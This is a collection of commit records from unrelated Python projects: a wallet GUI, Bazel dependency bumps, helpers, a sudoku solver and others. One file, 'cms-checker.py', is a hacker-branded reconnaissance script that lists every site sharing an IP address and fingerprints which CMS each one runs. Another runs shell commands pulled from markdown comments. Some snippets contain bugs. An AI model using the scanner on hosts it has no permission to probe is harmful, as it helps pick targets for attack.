393735aaf76b6ddf773a06a72f0872334e56557e | add litgtk.py file | cmd/litgtk/litgtk.py | cmd/litgtk/litgtk.py | #!/usr/bin/env python
import websocket # `pip install websocket-client`
import json
import pygtk
pygtk.require('2.0')
import gtk
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # global for socket connection
def getBal():
rpcCmd = {
"method": "LitRPC.Bal",
"params": [{
}]
}
rpcCmd.update({"jsonrpc": "2.0", "id": "93"})
print(json.dumps(rpcCmd))
s.sendall(json.dumps(rpcCmd))
r = json.loads(s.recv(8000000))
print(r)
return r["result"]["TotalScore"]
def getAdr():
rpcCmd = {
"method": "LitRPC.Address",
"params": [{
"NumToMake": 0,
}]
}
rpcCmd.update({"jsonrpc": "2.0", "id": "94"})
print(json.dumps(rpcCmd))
s.sendall(json.dumps(rpcCmd))
r = json.loads(s.recv(8000000))
print(r)
n = len(r["result"]["PreviousAddresses"]) -1
return r["result"]["PreviousAddresses"][n] #[len(r["result"]["PreviousAddresses"]-1)]
def prSend(adr, amt):
rpcCmd = {
"method": "LitRPC.Send",
"params": [{"DestAddrs": [adr,],"Amts": [amt,]}]
}
rpcCmd.update({"jsonrpc": "2.0", "id": "95"})
print(json.dumps(rpcCmd))
s.sendall(json.dumps(rpcCmd))
r = json.loads(s.recv(8000000))
print(r)
if r["error"] != None:
return "send error: " + r["error"]
return "Sent. TXID: " + r["result"]["Txids"][0]
class lndrpcui:
def dialogg(self, widget, adrWidget, amtWidget):
txid = prSend(adrWidget.get_text(), amtWidget.get_value_as_int())
d = gtk.MessageDialog(
type=gtk.MESSAGE_INFO, buttons=gtk.BUTTONS_OK,message_format=txid)
d.run()
d.destroy()
def gBal(self, widget, balWidget, rcvadrWidget):
bal = getBal()
balWidget.set_text("Balance: " + "{:,}".format(bal) + " (" + str(bal/100000000.0) + "BTC)")
adr = getAdr()
rcvadrWidget.set_text(adr)
def __init__(self):
window = gtk.Window(gtk.WINDOW_TOPLEVEL)
self.window = window
window.connect("destroy", lambda w: gtk.main_quit())
window.set_title("lit-gtk")
main_vbox = gtk.VBox(False, 5)
main_vbox.set_border_width(10)
window.add(main_vbox)
rcvFrame = gtk.Frame("Receive Address")
main_vbox.pack_start(rcvFrame, True, False, 0)
#~ recvHbox
rcvhbox = gtk.HBox(False, 0)
rcvhbox.set_border_width(5)
rcvFrame.add(rcvhbox)
rcvLabel = gtk.Label("receive address here")
rcvLabel.set_selectable(True)
rcvhbox.pack_start(rcvLabel, False, False, 5)
balFrame = gtk.Frame("balance")
main_vbox.pack_start(balFrame, True, False, 0)
#~ balHbox
balhbox = gtk.HBox(False, 0)
balhbox.set_border_width(5)
balFrame.add(balhbox)
balLabel = gtk.Label("balance here")
refreshButton = gtk.Button("Refresh")
refreshButton.connect("clicked", self.gBal, balLabel, rcvLabel)
balhbox.pack_start(refreshButton, False, False, 5)
balhbox.pack_end(balLabel, False, False, 5)
#~ adr / amt vbox
frame = gtk.Frame("send coins (satoshis)")
main_vbox.pack_start(frame, True, False, 0)
vbox = gtk.VBox(False, 0)
vbox.set_border_width(5)
frame.add(vbox)
#~ adr / amt hbox
hbox = gtk.HBox(False, 0)
vbox.pack_start(hbox, False, False, 5)
sendButton = gtk.Button("Send")
vbox.pack_start(sendButton, False, False, 5)
#~ adrVbox
adrVbox = gtk.VBox(False, 0)
hbox.pack_start(adrVbox, True, True, 5)
adrLabel = gtk.Label("send to address")
adrLabel.set_alignment(0, 1)
adrVbox.pack_start(adrLabel, False, False, 0)
adrEntry = gtk.Entry(50)
adrEntry.set_size_request(500, -1)
adrVbox.pack_start(adrEntry, True, True, 0)
#~ amtVbox
amtVbox = gtk.VBox(False, 0)
hbox.pack_start(amtVbox, False, False, 5)
label = gtk.Label("amount")
label.set_alignment(0, 1)
amtVbox.pack_start(label, False, False, 0)
adj = gtk.Adjustment(0, 1000000, 100000000.0, 1.0)
sendamtSpinner = gtk.SpinButton(adj, 1.0, 0)
sendamtSpinner.set_wrap(False)
#~ sendamtSpinner.set_size_request(100, -1)
amtVbox.pack_start(sendamtSpinner, False, False, 0)
#~ sendButton.connect("clicked", lambda w: prSend(adrEntry, sendamtSpinner))
sendButton.connect("clicked", self.dialogg, adrEntry, sendamtSpinner)
quitButton = gtk.Button("Quit")
quitButton.connect("clicked", lambda w: gtk.main_quit())
buttonBox = gtk.HBox(False, 0)
buttonBox.pack_start(quitButton, False, False, 5)
main_vbox.pack_start(buttonBox, False, False, 5)
window.show_all()
def main():
s.connect(("127.0.0.1", 8001))
gtk.main()
return 0
if __name__ == "__main__":
lndrpcui()
main()
| Python | 0 | |
398a6d23266e52436e6b8efd9d7ab053f490eb45 | add a lib to support requests with retries | octopus/lib/requests_get_with_retries.py | octopus/lib/requests_get_with_retries.py | import requests
from time import sleep
def http_get_with_backoff_retries(url, max_retries=5, timeout=30):
if not url:
return
attempt = 0
r = None
while attempt <= max_retries:
try:
r = requests.get(url, timeout=timeout)
break
except requests.exceptions.Timeout:
attempt += 1
sleep(2 ** attempt)
return r | Python | 0 | |
a8b524318d7f9d4406193d610b2bb3ef8e56e147 | Add frameless drag region example. | examples/frameless_drag_region.py | examples/frameless_drag_region.py | import webview
'''
This example demonstrates a user-provided "drag region" to move a frameless window
around, whilst maintaining normal mouse down/move events elsewhere. This roughly
replicates `-webkit-drag-region`.
'''
html = '''
<head>
<style type="text/css">
.pywebview-drag-region {
width: 50px;
height: 50px;
margin-top: 50px;
margin-left: 50px;
background: orange;
}
</style>
</head>
<body>
<div class="pywebview-drag-region">Drag me!</div>
</body>
'''
if __name__ == '__main__':
window = webview.create_window(
'API example',
html=html,
frameless=True,
easy_drag=False,
)
webview.start()
| Python | 0 | |
6fde041c3a92f0d0a0b92da55b12c8e60ecc7196 | Create handle_file.py | handle_file.py | handle_file.py | import os,sys,subprocess
g_dbg = '-dbg' in sys.argv or False
def handle_generic(fp,fn,fe):
print 'Unknown extension for [{}]'.format(fp)
def handle_md(fp,fn,fe):
started = False; exec_cmd = [];
with open(fp, "r") as ifile:
lines = [x.rstrip().strip() for x in ifile.readlines()]
for line in lines:
if started or line.startswith('<!---'):
started = True
exec_cmd.append(line.replace('<!---', ''))
if '-->' in exec_cmd[-1]:
exec_cmd[-1] = exec_cmd[-1].split('-->')[0]
break
if len(exec_cmd):
exec_cmd = ''.join(exec_cmd)
if g_dbg:
print 'exec_cmd = [{}]'.format(exec_cmd)
sys.stdout.flush()
print 'running ...'; sys.stdout.flush()
os.chdir(os.path.dirname(fp))
pop = subprocess.Popen(exec_cmd.split())
pop.wait()
print 'done'
else:
print 'No command found for [{}]'.format(fp)
k_ext_handlers = {'.md': handle_md}
fp,(fn,fe) = sys.argv[1], os.path.splitext(sys.argv[1])
if g_dbg:
print 'fp,(fn,fe) = ', fp,(fn,fe)
k_ext_handlers.get(fe, handle_generic)(fp,fn,fe)
| Python | 0.000003 | |
829dbfe0c13284345e0fa305f71937738a6c8f50 | Create cms-checker.py | web/cms-checker.py | web/cms-checker.py | #!/usr/bin/env python
# Original source: http://www.blackcoder.info/c/cmschecker.txt
# Usage example: $ python cms-checker.py --addr 192.168.1.1
import urllib2
import argparse
import os
import sys
class neo:
def cmsfinder(self):
url = "http://api.hackertarget.com/reverseiplookup/?q="+args.addr
rever = urllib2.Request(url)
conn = urllib2.urlopen(rever).read()
sp = conn.split("\n")
for s in sp:
CMS_URL = "http://"+s
_Con = urllib2.Request(CMS_URL)
_Data = urllib2.urlopen(_Con).read()
if 'Joomla' in _Data:
print "\t\t"+ s + '\t\033[1;34m --> Joomla\033[1;m'
with open('Joomla.txt', 'a') as j:
j.write(s+"\n")
elif 'wordpress' in _Data:
print "\t\t"+ s + '\t\033[1;38m --> WordPress\033[1;m'
with open('Wordpress.txt', 'a') as w:
w.write(s+"\n")
elif 'Drupal' in _Data:
print "\t\t"+ s + '\t\033[1;36m --> Drupal\033[1;m'
with open('Drupal.txt', 'a') as D:
D.write(s+"\n")
elif 'vBulletin' in _Data:
print "\t\t"+ s + '\t\033[1;38m --> vBulletin \033[1;m'
with open('vBulletin.txt', 'a') as vB:
vB.write(s+"\n")
else:
print "\t\t"+ s + '\t\033[1;37m --> No CMS \033[1;m'
with open('normal_site.txt', 'a') as f:
f.write(s+"\n")
def __init__(self):
if os.name == "nt":
os.system('cls')
else:
os.system('clear')
banner = """ \t\t\t\t
\t\t\t\t\033[1;31m
\t\t\t\t _____ _____ _____ _____ _ _
\t\t\t\t| | | __| | __|_|___ _| |___ ___
\t\t\t\t| --| | | |__ | | __| | | . | -_| _|
\t\t\t\t|_____|_|_|_|_____| |__| |_|_|_|___|___|_|
\t\t\t\t \033[1;m
\t\t\t\tCoded By Ne0-h4ck3r
"""
print banner
print ""
print "\t\t" + "-" * 100
print ""
if len(sys.argv) == 1:
print ""
print "\t\tHow To Use: python sitecheker.py --addr [ IP ]"
print ""
sys.exit(1)
black = argparse.ArgumentParser()
black.add_argument('--addr', help="Enter Your IP-ADDRESS: ")
args = black.parse_args()
if __name__ == "__main__":
neo().cmsfinder()
| Python | 0.000002 | |
85a604a1991b5dc9a017514848645723921247a7 | add missing file | mcp/constants.py | mcp/constants.py | #
# Copyright (c) 2007 rPath, Inc.
#
# All rights reserved
#
version = '1.0.0'
| Python | 0.000003 | |
a857340a2d67a8055b9e3802327800dcdd652df4 | Update TFRT dependency to use revision http://github.com/tensorflow/runtime/commit/037eb7657cb3f49c70c18f959421831e6cb9e4ad. | third_party/tf_runtime/workspace.bzl | third_party/tf_runtime/workspace.bzl | """Provides the repository macro to import TFRT."""
load("//third_party:repo.bzl", "tf_http_archive", "tf_mirror_urls")
def repo():
"""Imports TFRT."""
# Attention: tools parse and update these lines.
TFRT_COMMIT = "037eb7657cb3f49c70c18f959421831e6cb9e4ad"
TFRT_SHA256 = "80194df160fb8c91c7fcc84f34a60c16d69bd66f6b2f8e5404fae5e7d1221533"
tf_http_archive(
name = "tf_runtime",
sha256 = TFRT_SHA256,
strip_prefix = "runtime-{commit}".format(commit = TFRT_COMMIT),
urls = tf_mirror_urls("https://github.com/tensorflow/runtime/archive/{commit}.tar.gz".format(commit = TFRT_COMMIT)),
# A patch file can be provided for atomic commits to both TF and TFRT.
# The job that bumps the TFRT_COMMIT also resets patch_file to 'None'.
patch_file = None,
)
| """Provides the repository macro to import TFRT."""
load("//third_party:repo.bzl", "tf_http_archive", "tf_mirror_urls")
def repo():
"""Imports TFRT."""
# Attention: tools parse and update these lines.
TFRT_COMMIT = "d6884515d2b821161b35c1375d6ea25fe6811d62"
TFRT_SHA256 = "0771a906d327a92bdc46b02c8ac3ee1593542ceadc07220e53790aa8c7ea5702"
tf_http_archive(
name = "tf_runtime",
sha256 = TFRT_SHA256,
strip_prefix = "runtime-{commit}".format(commit = TFRT_COMMIT),
urls = tf_mirror_urls("https://github.com/tensorflow/runtime/archive/{commit}.tar.gz".format(commit = TFRT_COMMIT)),
# A patch file can be provided for atomic commits to both TF and TFRT.
# The job that bumps the TFRT_COMMIT also resets patch_file to 'None'.
patch_file = None,
)
| Python | 0.000002 |
c563f12bcb8b10daca64e19ade3c373c112cb659 | Update TFRT dependency to use revision http://github.com/tensorflow/runtime/commit/8f7619fa042357fa754002104f575a8a72ee69ed. | third_party/tf_runtime/workspace.bzl | third_party/tf_runtime/workspace.bzl | """Provides the repository macro to import TFRT."""
load("//third_party:repo.bzl", "tf_http_archive")
def repo():
"""Imports TFRT."""
# Attention: tools parse and update these lines.
TFRT_COMMIT = "8f7619fa042357fa754002104f575a8a72ee69ed"
TFRT_SHA256 = "2cb8410fb4655d71c099fb9f2d3721d0e485c8db518553347ce21ca09e0e1b43"
tf_http_archive(
name = "tf_runtime",
sha256 = TFRT_SHA256,
strip_prefix = "runtime-{commit}".format(commit = TFRT_COMMIT),
urls = [
"http://mirror.tensorflow.org/github.com/tensorflow/runtime/archive/{commit}.tar.gz".format(commit = TFRT_COMMIT),
"https://github.com/tensorflow/runtime/archive/{commit}.tar.gz".format(commit = TFRT_COMMIT),
],
)
| """Provides the repository macro to import TFRT."""
load("//third_party:repo.bzl", "tf_http_archive")
def repo():
"""Imports TFRT."""
# Attention: tools parse and update these lines.
TFRT_COMMIT = "584ba7eab84bd45941fabc28fbe8fa43c74673d8"
TFRT_SHA256 = "e2f45638580ba52116f099d52b73c3edcf2ad81736a434fb639def38ae4cb225"
tf_http_archive(
name = "tf_runtime",
sha256 = TFRT_SHA256,
strip_prefix = "runtime-{commit}".format(commit = TFRT_COMMIT),
urls = [
"http://mirror.tensorflow.org/github.com/tensorflow/runtime/archive/{commit}.tar.gz".format(commit = TFRT_COMMIT),
"https://github.com/tensorflow/runtime/archive/{commit}.tar.gz".format(commit = TFRT_COMMIT),
],
)
| Python | 0.000001 |
29e3d6b706a33780b1cb4863200ec7525ff035ce | Update TFRT dependency to use revision http://github.com/tensorflow/runtime/commit/cdf6d36e9a5c07770160ebac25b153481c37a247. | third_party/tf_runtime/workspace.bzl | third_party/tf_runtime/workspace.bzl | """Provides the repository macro to import TFRT."""
load("//third_party:repo.bzl", "tf_http_archive")
def repo():
"""Imports TFRT."""
# Attention: tools parse and update these lines.
TFRT_COMMIT = "cdf6d36e9a5c07770160ebac25b153481c37a247"
TFRT_SHA256 = "c197f9b3584cae2d65fc765f999298ae8b70d9424ec0d4dd30dbdad506fb98bb"
tf_http_archive(
name = "tf_runtime",
sha256 = TFRT_SHA256,
strip_prefix = "runtime-{commit}".format(commit = TFRT_COMMIT),
urls = [
"http://mirror.tensorflow.org/github.com/tensorflow/runtime/archive/{commit}.tar.gz".format(commit = TFRT_COMMIT),
"https://github.com/tensorflow/runtime/archive/{commit}.tar.gz".format(commit = TFRT_COMMIT),
],
)
| """Provides the repository macro to import TFRT."""
load("//third_party:repo.bzl", "tf_http_archive")
def repo():
"""Imports TFRT."""
# Attention: tools parse and update these lines.
TFRT_COMMIT = "6ca8a6dff0e5d4f3a17b0c0879aa5de622683680"
TFRT_SHA256 = "09779efe84cc84e859e206dd49ae6b993577d7dae41f90491e5b862d7a70ba51"
tf_http_archive(
name = "tf_runtime",
sha256 = TFRT_SHA256,
strip_prefix = "runtime-{commit}".format(commit = TFRT_COMMIT),
urls = [
"http://mirror.tensorflow.org/github.com/tensorflow/runtime/archive/{commit}.tar.gz".format(commit = TFRT_COMMIT),
"https://github.com/tensorflow/runtime/archive/{commit}.tar.gz".format(commit = TFRT_COMMIT),
],
)
| Python | 0.000002 |
6276cf142d233db377dc490a47c5ad56d2906c75 | Add version module | cards/version.py | cards/version.py | # coding=utf-8
__version__ = '0.4.9'
| Python | 0 | |
6c7df140c6dccb4b56500ba25f6b66ab7ea3b605 | solve 1 problem | solutions/reverse-bits.py | solutions/reverse-bits.py | #!/usr/bin/env python
# encoding: utf-8
"""
reverse-bits.py
Created by Shuailong on 2016-03-02.
https://leetcode.com/problems/reverse-bits/.
"""
class Solution(object):
def reverseBits(self, n):
"""
:type n: int
:rtype: int
"""
res = 0
count = 0
while n:
d = n & 1
n >>= 1
res <<= 1
res += d
count += 1
res <<= 32-count
return res
def main():
solution = Solution()
n = 43261596
print solution.reverseBits(n)
if __name__ == '__main__':
main()
| Python | 0.000027 | |
793b273c3fdcef428ffb6aec5dbcbb768989f175 | Add 0004 file | Drake-Z/0004/0004.py | Drake-Z/0004/0004.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
'第 0004 题:任一个英文的纯文本文件,统计其中的单词出现的个数。'
__author__ = 'Drake-Z'
import re
def tongji(file_path):
f = open(file_path, 'r').read()
f = re.split(r'[\s\,\;,\n]+', f)
print(len(f))
return 0
if __name__ == '__main__':
file_path = 'English.txt'
tongji(file_path) | Python | 0.000001 | |
06f66859c305465c3f6f38617ecada4da94d41ff | set up skeleton | algorithms/sorting/quicksort.py | algorithms/sorting/quicksort.py | from random import randint
def quicksort(unsorted):
if len(unsorted) <= 1:
return unsorted
start = 0
end = start + 1
pivot = choose_pivot(start, end)
sort(unsorted, start, pivot, end)
def choose_pivot(start, end):
pivot = randint(start, end)
return pivot
def sort(unsorted, start, pivot, end):
pass
if __name__ == '__main__':
unsorted = [3,345,456,7,879,970,7,4,23,123,45,467,578,78,6,4,324,145,345,3456,567,5768,6589,69,69]
sort = quicksort(unsorted)
print '%r <-- unsorted' % unsorted
print '%r <-- sorted' % sort
| Python | 0.000002 | |
0e31b15e4dae95b862fd4777659a9210e5e4ec86 | change of file path | preprocessing/python_scripts/renpass_gis/simple_feedin/renpassgis_feedin.py | preprocessing/python_scripts/renpass_gis/simple_feedin/renpassgis_feedin.py | """
ToDO:
* Greate one scaled time series
*
Database table:
* model_draft.ego_weather_measurement_point
* model_draft.ego_simple_feedin_full
Change db.py and add ego_simple_feedin_full
"""
__copyright__ = "ZNES"
__license__ = "GNU Affero General Public License Version 3 (AGPL-3.0)"
__url__ = "https://github.com/openego/data_processing/blob/master/LICENSE"
__author__ = "wolf_bunke"
from oemof.db import coastdat
import db
import pandas as pd
# get Classes and make settings
points = db.Points
conn = db.conn
scenario_name = 'eGo 100'
weather_year = 2011
filename = '2017-08-21_simple_feedin_ego-100-wj2011_all.csv'
config = 'config.ini'
import pandas as pd
import psycopg2
from sqlalchemy import create_engine
import numpy as np
from db import conn, readcfg, dbconnect
import os
# Settings
#filename = '2017-08-07_simple_feedin_All_subids_weatherids_ego_weatherYear2011.csv'
filename = 'simple_feedin_full.csv'
conn = conn
# read configuration file
path = os.path.join(os.path.expanduser("~"), '.open_eGo', 'config.ini')
config = readcfg(path=path)
# establish DB connection
section = 'oedb'
conn = dbconnect(section=section, cfg=config)
| Python | 0.000002 | |
cbd64641f30c1a464528a2ec6d5323d29766830d | Add word embedding | hazm/embedding.py | hazm/embedding.py | from . import word_tokenize
from gensim.models import KeyedVectors
from gensim.scripts.glove2word2vec import glove2word2vec
import fasttext, os
supported_embeddings = ['fasttext', 'keyedvector', 'glove']
class WordEmbedding:
def __init__(self, model_type, model=None):
if model_type not in supported_embeddings:
raise KeyError(f'Model type "{model_type}" is not supported! Please choose from {supported_embeddings}')
if model:
self.model = model
self.model_type = model_type
def load_model(self, model_file):
if self.model_type == 'fasttext':
self.model = fasttext.load_model(model_file)
elif self.model_type == 'keyedvector':
if model_file.endswith('bin'):
self.model = KeyedVectors.load_word2vec_format(model_file, binary=True)
else:
self.model = KeyedVectors.load_word2vec_format(model_file)
elif self.model_type == 'glove':
word2vec_addr = str(model_file) + '_word2vec_format.vec'
if not os.path.exists(word2vec_addr):
_ = glove2word2vec(model_file, word2vec_addr)
self.model = KeyedVectors.load_word2vec_format(word2vec_addr)
self.model_type = 'keyedvector'
else:
raise KeyError(f'{self.model_type} not supported! Please choose from {supported_embeddings}')
def __getitem__(self, word):
if not self.model:
raise AttributeError('Model must not be None! Please load model first.')
return self.model[word]
def doesnt_match(self, txt):
if not self.model:
raise AttributeError('Model must not be None! Please load model first.')
return self.model.doesnt_match(word_tokenize(txt))
def similarity(self, word1, word2):
if not self.model:
raise AttributeError('Model must not be None! Please load model first.')
return self.model.similarity(word1, word2)
def get_vocab(self):
if not self.model:
raise AttributeError('Model must not be None! Please load model first.')
return self.model.get_words(include_freq=True)
def nearest_words(self, word, topn):
if not self.model:
raise AttributeError('Model must not be None! Please load model first.')
return self.model.get_nearest_neighbors(word, topn)
| Python | 0.00733 | |
f34c91a6969567b23ad880dc43a0346cc5a5b513 | Add get_arxiv.py to download PDF from arXiv | cli/get_arxiv.py | cli/get_arxiv.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Get the arxiv abstract data and PDF for a given arxiv id.
#
# Weitian LI <liweitianux@gmail.com>
# 2015/01/23
#
import sys
import re
import urllib
import subprocess
import time
import mimetypes
from bs4 import BeautifulSoup
mirror = "http://jp.arxiv.org/"
def get_url(arxiv_id):
"""
Determine the full arxiv URL from the given ID/URL.
"""
if re.match(r'^[0-9]{7}$', arxiv_id):
print("ERROR: 7-digit ID not supported, please use the full URL")
sys.exit(2)
elif re.match(r'^[0-9]{4}\.[0-9]{4,5}$', arxiv_id):
arxiv_url = mirror + "abs/" + arxiv_id
elif re.match(r'^https{0,1}://.*arxiv.*/([0-9]{7}|[0-9]{4}\.[0-9]{4,5})$',
arxiv_id):
arxiv_url = arxiv_id
elif re.match(r'[a-zA-Z0-9.-]*arxiv.*/([0-9]{7}|[0-9]{4}\.[0-9]{4,5})$',
arxiv_id):
arxiv_url = "http://" + arxiv_id
else:
print("ERROR: unknown arxiv ID: %s" % arxiv_id)
exit(3)
return arxiv_url
def get_id(arxiv_url):
"""
Extract the ID from the URL.
"""
return arxiv_url.split('/')[-1]
def get_arxiv_abstract(arxiv_url):
"""
Get the arxiv abstract data and save to file '${id}.txt'.
"""
request = urllib.request.urlopen(arxiv_url)
arxiv_html = request.read()
soup = BeautifulSoup(arxiv_html)
title = soup.body.find('h1', attrs={'class': 'title'}).text\
.replace('\n', ' ')
authors = soup.body.find('div', attrs={'class': 'authors'}).text\
.replace('\n', ' ')
date = soup.body.find('div', attrs={'class': 'dateline'}).text\
.strip('()')
abstract = soup.body.find('blockquote', attrs={'class': 'abstract'})\
.text.replace('\n', ' ')[1:]
comments = soup.body.find('td', attrs={'class': 'comments'}).text
subjects = soup.body.find('td', attrs={'class': 'subjects'}).text
arxiv_id = get_id(arxiv_url)
filename = arxiv_id + '.txt'
f = open(filename, 'w')
f.write("URL: %s\n" % arxiv_url)
f.write("arXiv: %s\n" % arxiv_id)
f.write("%s\n\n" % date)
f.write("%s\n%s\n\n" % (title, authors))
f.write("%s\n\n" % abstract)
f.write("Comments: %s\n" % comments)
f.write("Subjects: %s\n" % subjects)
f.close()
def get_arxiv_pdf(arxiv_url):
"""
Get the arxiv PDF with cURL.
If the PDF is not generated yet, then retry after 10 seconds.
"""
p = re.compile(r'/abs/')
arxiv_pdf_url = p.sub('/pdf/', arxiv_url)
arxiv_id = get_id(arxiv_url)
filename = arxiv_id + '.pdf'
cmd = 'curl -o %(filename)s %(url)s' %\
{'filename': filename, 'url': arxiv_pdf_url}
print("CMD: %(cmd)s" % {'cmd': cmd})
subprocess.call(cmd, shell=True)
output = subprocess.check_output(['file', '-ib', filename])
filetype = output.decode(encoding='UTF-8').split(';')[0]
pdftype = 'application/pdf'
while filetype != pdftype:
time.sleep(10)
subprocess.call(cmd, shell=True)
output = subprocess.check_output(['file', '-ib', filename])
filetype = output.decode(encoding='UTF-8').split(';')[0]
def main():
if len(sys.argv) != 2:
print("Usage: %s <arxiv_id | arxiv_url>\n")
sys.exit(1)
arxiv_url = get_url(sys.argv[1])
arxiv_id = get_id(arxiv_url)
print("arxiv_url: %s" % arxiv_url)
print("arxiv_id: %s" % arxiv_id)
get_arxiv_abstract(arxiv_url)
print("downloading pdf ...")
get_arxiv_pdf(arxiv_url)
if __name__ == '__main__':
main()
| Python | 0 | |
13851dd6f2101ceea917504bd57540a4e54f0954 | Create __init__.py | fb_nsitbot/migrations/__init__.py | fb_nsitbot/migrations/__init__.py | Python | 0.000429 | ||
14647b71fec7a81d92f044f6ac88304a4b11e5fd | create http server module | src/step1.py | src/step1.py | """A simple HTTP server."""
def response_ok():
"""Testing for 200 response code."""
pass
| Python | 0 | |
0a97f34b4ae4f7f19bfe00c26f495f399f827fab | Add file_regex | python/file_regex/tmp.py | python/file_regex/tmp.py | # -*- coding: utf-8 -*-
import re
file_name = 'hogehoge'
org_file = open(file_name + '.txt')
lines = org_file.readlines()
org_file.close()
dist_file = open(file_name + '_after.txt', 'w')
pattern = r'title=\".+?\"'
all_title = re.findall(pattern, ''.join(lines))
if all_title:
for title in all_title:
dist_file.write(title.replace('\"', '').replace('title=', '') + '\n')
dist_file.close()
| Python | 0.000001 | |
0297e8b1762d495ffd696106bc6498def0ddf600 | Add membership.utils.monthRange to calculate start and end dates of months easily | spiff/membership/utils.py | spiff/membership/utils.py | import datetime
import calendar
from django.utils.timezone import utc
def monthRange(today=None):
if today is None:
today = datetime.datetime.utcnow().replace(tzinfo=utc)
lastDayOfMonth = calendar.monthrange(today.year, today.month)[1]
startOfMonth = datetime.datetime(today.year, today.month, 1, tzinfo=utc)
endOfMonth = datetime.datetime(today.year, today.month, lastDayOfMonth, tzinfo=utc)
return (startOfMonth, endOfMonth)
| Python | 0 | |
6441ce1bc3132220e2d86bb75eff9169b3675751 | add spiderNormal | spiderNormal.py | spiderNormal.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#author zeck.tang 2016.03.03
"""
文件头两行注释是用于避免文件中包含中文导致如下错误
SyntaxError: Non-ASCII character XXX in file xxx.py on line xx, but no encoding declared
see http://python.org/dev/peps/pep-0263/ for details
如果遇到
IndentationError: unexpected indent
这样的错误,请仔细检查每个空格和tab
"""
import urllib
import urllib2
import re
# 这个是百度手机助手里面优酷的用户评论的信息获取url,咱是用Charles抓包拿到的
# ps:这个只有第一页数据,可以改写下动态传入pn参数值获取后续页面的信息
url = 'http://shouji.baidu.com/comment?action_type=getCommentList&groupid=3528441&pn=1'
# UserAgent设置 如果有需要UA的话
#user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'
#headers = { 'User-Agent' : user_agent }
try:
# UA塞进头里
#request = urllib2.Request(url,headers = headers)
request = urllib2.Request(url)
response = urllib2.urlopen(request)
content = response.read().decode('utf-8') # utf-8格式读出来避免乱码
# 可以先打印看看content内容然后看怎么写正则
# print content
# content内容非常规则,每个<li></li>包含一条评论信息内容
# <em>(.*?)</em>是用户名称
# <p>(.*?)</p>是评论内容
# <div.*?time">(.*?)</div>是评论时间
pattern = re.compile('<em>(.*?)</em>.*?<p>(.*?)</p>.*?<div.*?time">(.*?)</div>',re.S)
items = re.findall(pattern,content)
for item in items:
#打印每一条评论
print item[0] #用户名称
print item[1] #用户评论
print item[2] #评论时间
print "----------"
except urllib2.URLError, e:
if hasattr(e,"code"):
print e.code
else :
print "code else"
if hasattr(e,"reason"):
print e.reason
else:
print "reason else"
| Python | 0.999891 | |
747733309d0fb0c47dac2ae8c0056a461c632b5c | Add base classes and run some experiments | sudoku.py | sudoku.py | """
Module for solving Sudoku Puzzles
"""
class Cell(object):
def __init__(self, value=None):
self.solved = False
self.excluded = []
self.value = value if value is not None else -1
self.row = None
self.column = None
self.box = None
def exclude(self):
# add all values in parent row, column and box to the excluded set
pass
class Line(object):
def __init__(self, cells=None):
self.cells = cells if cells is not None else []
class Box(object):
def __init__(self, cells=None):
self.cells = cells if cells is not None else []
self.rows = []
self.columns = []
self.unsolved_cell_indices = []
self.unsolved_values = []
self.cell_to_noncolumn = {
0: [1,2],
3: [1,2],
6: [1,2],
1: [0,2],
4: [0,2],
7: [0,2],
2: [0,1],
5: [0,1],
8: [0,1]
}
self.cell_to_nonrow = {
0: [1,2],
1: [1,2],
2: [1,2],
3: [0,2],
4: [0,2],
5: [0,2],
6: [0,1],
7: [0,1],
8: [0,1]
}
def eliminate(self):
"""
Look for cells that must have a certain value
For all the unsolved cell in
"""
for index in range(9):
others = range(9)
others.remove(index)
for value in range(1,10):
# If the cell is not already solved
if not self.cells[index].solved:
# If this cell cannot hold this value, continue to next value
if value not in self.cells[index].possible_values
continue
# If all other cells cannot hold this value, this cell must be this value. Break and go to next value
if all([value not in self.cells[other].possible_values for other in others]):
self.cells[index].set_solved(value)
break
class Grid(object):
def __init__(self):
self.cells = []
self.rows = []
self.columns = []
def setuptest(self):
self.cells = [Cell(value=i) for i in range(81)]
self.rows = [Line(cells=self.cells[i*9:(i*9)+8]) for i in range(0,9)]
self.columns = [
Line(cells=[self.cells[i] for i in range(0,81,9)]),
Line(cells=[self.cells[i] for i in range(1,81,9)]),
Line(cells=[self.cells[i] for i in range(2,81,9)]),
Line(cells=[self.cells[i] for i in range(3,81,9)]),
Line(cells=[self.cells[i] for i in range(4,81,9)]),
Line(cells=[self.cells[i] for i in range(5,81,9)]),
Line(cells=[self.cells[i] for i in range(6,81,9)]),
Line(cells=[self.cells[i] for i in range(7,81,9)]),
Line(cells=[self.cells[i] for i in range(8,81,9)])
]
self.boxes = [
Box(cells=
[self.cells[i], self.cells[i+1], self.cells[i+2],
self.cells[i+9], self.cells[i+10], self.cells[i+11],
self.cells[i+18], self.cells[i+19], self.cells[i+20]]
) for i in [0,3,6,27,30,33,54,57,60]
]
def display(self):
for row in range(9):
print "|".join(["{0:2}".format(self.cells[(row*9)+i].value) for i in range(9)])
def experiments():
# grid = Grid()
# grid.setuptest()
# print grid.cells[0].value
# print grid.rows[0].cells[0].value
# print grid.columns[0].cells[0].value
# print grid.boxes[0].cells[0].value
# grid.cells[0].value = 99
# print grid.cells[0].value
# print grid.rows[0].cells[0].value
# print grid.columns[0].cells[0].value
# print grid.boxes[0].cells[0].value
# grid.columns[0].cells[0].value = 999
# print grid.cells[0].value
# print grid.rows[0].cells[0].value
# print grid.columns[0].cells[0].value
# print grid.boxes[0].cells[0].value
# print grid.cells[42].value
# print grid.rows[4].cells[6].value
# print grid.columns[6].cells[4].value
# print grid.boxes[5].cells[3].value
# grid.boxes[0].cells[0].value = 0
# grid.display()
unsolved_cell_indices = [1,2,3]
unsolved_values = [4,5,6]
for index in unsolved_cell_indices:
for value in unsolved_values[:]:
print unsolved_values
if index == 2:
if 5 in unsolved_values:
unsolved_values.remove(5)
experiments() | Python | 0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.